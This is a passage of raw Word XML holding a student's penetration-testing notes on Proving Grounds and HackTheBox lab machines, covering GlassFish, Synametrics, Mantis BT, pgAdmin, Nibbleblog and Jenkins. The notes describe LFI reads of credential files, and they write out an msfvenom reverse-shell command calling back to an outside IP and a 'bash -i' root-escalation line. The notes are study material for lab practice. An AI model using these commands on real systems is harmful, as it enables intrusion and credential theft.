        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1378">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50130</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking password encryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GlassFish Server Open Source Edition 4.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1379">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice through an LFI exploit. After searching online for GlassFish 4 config files to look at, we found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glassfish4/glassfish/domains/domain1/config/admin-keyfile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glassfish4/glassfish/domains/domain1/config/local-password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">both of which had creds but were not crackable. And we could also read proof.txt! And then we later used it to read the config file of another service (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Synametrics File Manager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) which gave us creds for PE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then for privilege escalation, we exploited </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GlassFish Server Open Source Edition 4.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> again. We used credentials to login, and then we enumerated the website which allowed us to upload a reverse shell. We saw the webpage was .jsf which is java related, so I think they must have used this as a hint to use a java rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.45.222 LPORT=443 -f war &gt;shell.war</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAE">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="649"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Synametrics File Manager </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1380">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice since we had LFI from a previous exploit and we used that LFI to look at the config file of Synametrics File Manager that we searched up and found to be in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /synaman/config/AppConfig.xml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="649"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also the config path can be found here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1381">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/45387</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mantis Bug Tracker (Mantis BT) was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1382">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mantis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice where we were able to get LFI and then read Mantis Bug Tracker config file that gave us creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once we authenticated, we found a Mantis BT 2.5.2 exploit for RCE. It involved putting a reverse shell in a config file and then visiting the config file using the URL </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1383">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/48818</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pgAdmin Version 8.3 (pgAdmin 8.3) was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1384">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice. They used the exploit for RCE, and they had creds, but idk if creds were necessary. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1385">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABB">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ABC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cxdioxsr717t" w:id="544"/>
      <w:bookmarkEnd w:id="544"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nibbles:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ABF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webpage had nothing, but page source had a comment to a directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accessed Nibbleblog 4.0.3 which had CVE-2015-6967</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There is a metasploit module that can get reverse shell (search nibbleblog)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Somehow, we just HAD TO KNOW that the username and password was admin:nibbles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the metasploit module and then get reverse shell for user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See that you can run a file, but you also have edit privilege, so you can delete all content in file and then replace it with this script to give you root privilege:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, get root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Builder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one was all about Jenkins!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A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ACC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5jghjoax5g2z" w:id="545"/>
      <w:bookmarkEnd w:id="545"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penelope</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look into </w:t>
      </w:r>
      <w:hyperlink r:id="rId1386">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for upgraded shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003ACF">
      <w:pPr>
